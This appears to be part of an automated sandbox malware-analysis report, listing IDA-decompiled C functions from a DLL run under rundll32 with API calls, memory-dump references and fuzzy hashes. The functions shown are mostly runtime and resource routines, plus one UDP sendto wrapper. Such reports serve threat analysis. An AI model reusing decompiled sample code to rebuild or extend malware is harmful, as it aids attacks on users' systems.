                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fe79
                                                                                                                                                                            0x1000fe69
                                                                                                                                                                            0x1000febb
                                                                                                                                                                            0x1000febb

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32 ref: 1000FE52
                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1000FE65
                                                                                                                                                                              • Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC
                                                                                                                                                                            • GetTopWindow.USER32(?), ref: 1000FE95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 369458955-0
                                                                                                                                                                            • Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                                                                                            • Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
                                                                                                                                                                            • Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
                                                                                                                                                                            • Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                            				LONG* _t21;
                                                                                                                                                                            				long _t23;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				LONG* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            
                                                                                                                                                                            				_t35 = __eflags;
                                                                                                                                                                            				_t29 = __edx;
                                                                                                                                                                            				_t25 = __ebx;
                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                            				_push(0x1002fae0);
                                                                                                                                                                            				E1001984C(__ebx, __edi, __esi);
                                                                                                                                                                            				_t31 = E1001BF79(__edx, __edi, _t35);
                                                                                                                                                                            				_t15 =  *0x1005826c; // 0xfffffffe
                                                                                                                                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                            					E1001A549(0xd);
                                                                                                                                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                            					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                            					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                            					__eflags = _t33 -  *0x10058170; // 0x4601330
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                            						if(_t33 != 0) {
                                                                                                                                                                            							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                            							if(_t23 == 0) {
                                                                                                                                                                            								__eflags = _t33 - 0x10057d48;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_push(_t33);
                                                                                                                                                                            									E10016380(_t25, _t31, _t33, __eflags);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t21 =  *0x10058170; // 0x4601330
                                                                                                                                                                            						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                            						_t33 =  *0x10058170; // 0x4601330
                                                                                                                                                                            						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                            						InterlockedIncrement(_t33);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                            					E1001D757();
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                            					E10017DA6(_t25, _t29, _t31, 0x20);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E10019891(_t33);
                                                                                                                                                                            			}










                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6bc
                                                                                                                                                                            0x1001d6be
                                                                                                                                                                            0x1001d6c3
                                                                                                                                                                            0x1001d6cd
                                                                                                                                                                            0x1001d6cf
                                                                                                                                                                            0x1001d6d7
                                                                                                                                                                            0x1001d6f8
                                                                                                                                                                            0x1001d6fe
                                                                                                                                                                            0x1001d702
                                                                                                                                                                            0x1001d705
                                                                                                                                                                            0x1001d708
                                                                                                                                                                            0x1001d70e
                                                                                                                                                                            0x1001d710
                                                                                                                                                                            0x1001d712
                                                                                                                                                                            0x1001d715
                                                                                                                                                                            0x1001d71b
                                                                                                                                                                            0x1001d71d
                                                                                                                                                                            0x1001d71f
                                                                                                                                                                            0x1001d725
                                                                                                                                                                            0x1001d727
                                                                                                                                                                            0x1001d728
                                                                                                                                                                            0x1001d72d
                                                                                                                                                                            0x1001d725
                                                                                                                                                                            0x1001d71d
                                                                                                                                                                            0x1001d72e
                                                                                                                                                                            0x1001d733
                                                                                                                                                                            0x1001d736
                                                                                                                                                                            0x1001d73c
                                                                                                                                                                            0x1001d740
                                                                                                                                                                            0x1001d740
                                                                                                                                                                            0x1001d746
                                                                                                                                                                            0x1001d74d
                                                                                                                                                                            0x1001d6df
                                                                                                                                                                            0x1001d6df
                                                                                                                                                                            0x1001d6df
                                                                                                                                                                            0x1001d6e4
                                                                                                                                                                            0x1001d6e8
                                                                                                                                                                            0x1001d6ed
                                                                                                                                                                            0x1001d6f5

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
                                                                                                                                                                              • Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87
                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 1001D6E8
                                                                                                                                                                            • __lock.LIBCMT ref: 1001D6F8
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 1001D715
                                                                                                                                                                            • InterlockedIncrement.KERNEL32(04601330), ref: 1001D740
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2880340415-0
                                                                                                                                                                            • Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                                                                                            • Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
                                                                                                                                                                            • Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
                                                                                                                                                                            • Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E100126F9(void* __ecx, CHAR* _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HRSRC__* _t8;
                                                                                                                                                                            				void* _t9;
                                                                                                                                                                            				void* _t11;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				struct HINSTANCE__* _t17;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t14 = 0;
                                                                                                                                                                            				_t11 = 0;
                                                                                                                                                                            				_t19 = _a4;
                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t16 = E100122B0(_t11, _t18, _t11);
                                                                                                                                                                            					if(_t11 != 0 && _t14 != 0) {
                                                                                                                                                                            						FreeResource(_t14);
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t16;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
                                                                                                                                                                            				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t9 = LoadResource(_t17, _t8);
                                                                                                                                                                            				_t14 = _t9;
                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                            					_t11 = LockResource(_t14);
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t9;
                                                                                                                                                                            			}















                                                                                                                                                                            0x100126fd
                                                                                                                                                                            0x100126ff
                                                                                                                                                                            0x10012701
                                                                                                                                                                            0x10012705
                                                                                                                                                                            0x10012707
                                                                                                                                                                            0x1001273c
                                                                                                                                                                            0x10012746
                                                                                                                                                                            0x10012748
                                                                                                                                                                            0x1001274f
                                                                                                                                                                            0x1001274f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10012755
                                                                                                                                                                            0x1001270e
                                                                                                                                                                            0x1001271b
                                                                                                                                                                            0x10012723
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10012727
                                                                                                                                                                            0x1001272d
                                                                                                                                                                            0x10012731
                                                                                                                                                                            0x1001273a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001273a
                                                                                                                                                                            0x1001275b

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                                            • Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                                                                                            • Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                                                                                            • Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                            			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				short _v20;
                                                                                                                                                                            				short _v22;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                            				short _t18;
                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t15 ^ _t33;
                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                            				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
                                                                                                                                                                            				_v24 = 2;
                                                                                                                                                                            				__imp__#11(_a4);
                                                                                                                                                                            				_v20 = _t18;
                                                                                                                                                                            				__imp__#9(_a8);
                                                                                                                                                                            				_v22 = _t18;
                                                                                                                                                                            				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
                                                                                                                                                                            				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
                                                                                                                                                                            			}












                                                                                                                                                                            0x10001366
                                                                                                                                                                            0x1000136d
                                                                                                                                                                            0x10001370
                                                                                                                                                                            0x1000137b
                                                                                                                                                                            0x10001383
                                                                                                                                                                            0x1000138d
                                                                                                                                                                            0x10001393
                                                                                                                                                                            0x1000139b
                                                                                                                                                                            0x100013a1
                                                                                                                                                                            0x100013bc
                                                                                                                                                                            0x100013cf

                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 1000137B
                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 1000138D
                                                                                                                                                                            • htons.WS2_32(?), ref: 1000139B
                                                                                                                                                                            • sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memsethtonsinet_addrsendto
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1158618643-0
                                                                                                                                                                            • Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                                                                                            • Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
                                                                                                                                                                            • Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
                                                                                                                                                                            • Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000CCD3() {
                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                            				struct HWND__* _t19;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                                                                                                                                            				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                                                                            				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                                                                                                                                            					E10012913(_t23, 1);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                                                                                                                                            					EnableWindow( *(_t29 - 0x14), 1);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t29 - 0x14) != 0) {
                                                                                                                                                                            					_t19 = GetActiveWindow();
                                                                                                                                                                            					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                                                                                                                                            					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                                                                                                                                            						SetActiveWindow( *(_t29 - 0x14));
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *((intOrPtr*)( *_t28 + 0x60))();
                                                                                                                                                                            				E1000C6E6(_t23, _t28, 0, _t28, _t34);
                                                                                                                                                                            				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                                                                                                                                            					FreeResource( *(_t29 - 0x18));
                                                                                                                                                                            				}
                                                                                                                                                                            				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                                                                                                                                            				return E10017C60(_t16);
                                                                                                                                                                            			}








                                                                                                                                                                            0x1000ccd3
                                                                                                                                                                            0x1000ccd6
                                                                                                                                                                            0x1000ccde
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000ccec
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccfc
                                                                                                                                                                            0x1000ccfe
                                                                                                                                                                            0x1000cd04
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd16
                                                                                                                                                                            0x1000cd1b
                                                                                                                                                                            0x1000cd23
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd2e
                                                                                                                                                                            0x1000cd36

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                                                                                            • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,AF9B6515), ref: 1000CD0C
                                                                                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,AF9B6515), ref: 1000CD28
                                                                                                                                                                              • Part of subcall function 10012913: EnableWindow.USER32(?,AF9B6515), ref: 10012920
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 253586258-0
                                                                                                                                                                            • Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                                                                                            • Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                            			E1000AD21(void* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				char _v18;
                                                                                                                                                                            				char _v280;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                            				long _t14;
                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                            				char* _t18;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                            
                                                                                                                                                                            				_t11 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t11 ^ _t36;
                                                                                                                                                                            				_t35 = 0x104;
                                                                                                                                                                            				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                                                                                            				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t15 = 0;
                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t18 = PathFindExtensionA( &_v280);
                                                                                                                                                                            					_t35 = "%s.dll";
                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                            					asm("movsw");
                                                                                                                                                                            					_t32 =  &_v280;
                                                                                                                                                                            					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                            					_t33 = _t33;
                                                                                                                                                                            					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                                                                                            						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                                                                            			}

















                                                                                                                                                                            0x1000ad2a
                                                                                                                                                                            0x1000ad31
                                                                                                                                                                            0x1000ad37
                                                                                                                                                                            0x1000ad47
                                                                                                                                                                            0x1000ad4f
                                                                                                                                                                            0x1000ada6
                                                                                                                                                                            0x1000ada6
                                                                                                                                                                            0x1000ada6
                                                                                                                                                                            0x1000ad55
                                                                                                                                                                            0x1000ad5d
                                                                                                                                                                            0x1000ad63
                                                                                                                                                                            0x1000ad6b
                                                                                                                                                                            0x1000ad6c
                                                                                                                                                                            0x1000ad70
                                                                                                                                                                            0x1000ad7b
                                                                                                                                                                            0x1000ad81
                                                                                                                                                                            0x1000ad82
                                                                                                                                                                            0x1000ad83
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ad85
                                                                                                                                                                            0x1000ad90
                                                                                                                                                                            0x1000ad9f
                                                                                                                                                                            0x1000ad9f
                                                                                                                                                                            0x1000ad83
                                                                                                                                                                            0x1000adb4

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
                                                                                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D
                                                                                                                                                                              • Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF
                                                                                                                                                                              • Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                                                                                              • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                                                                                              • Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                                                            • String ID: %s.dll
                                                                                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                                                                                            • Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                                                                                            • Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                                                                                            • Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				signed int* _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                            				intOrPtr _t133;
                                                                                                                                                                            				intOrPtr _t138;
                                                                                                                                                                            				void* _t202;
                                                                                                                                                                            				void* _t203;
                                                                                                                                                                            
                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                            				_v16 = 1;
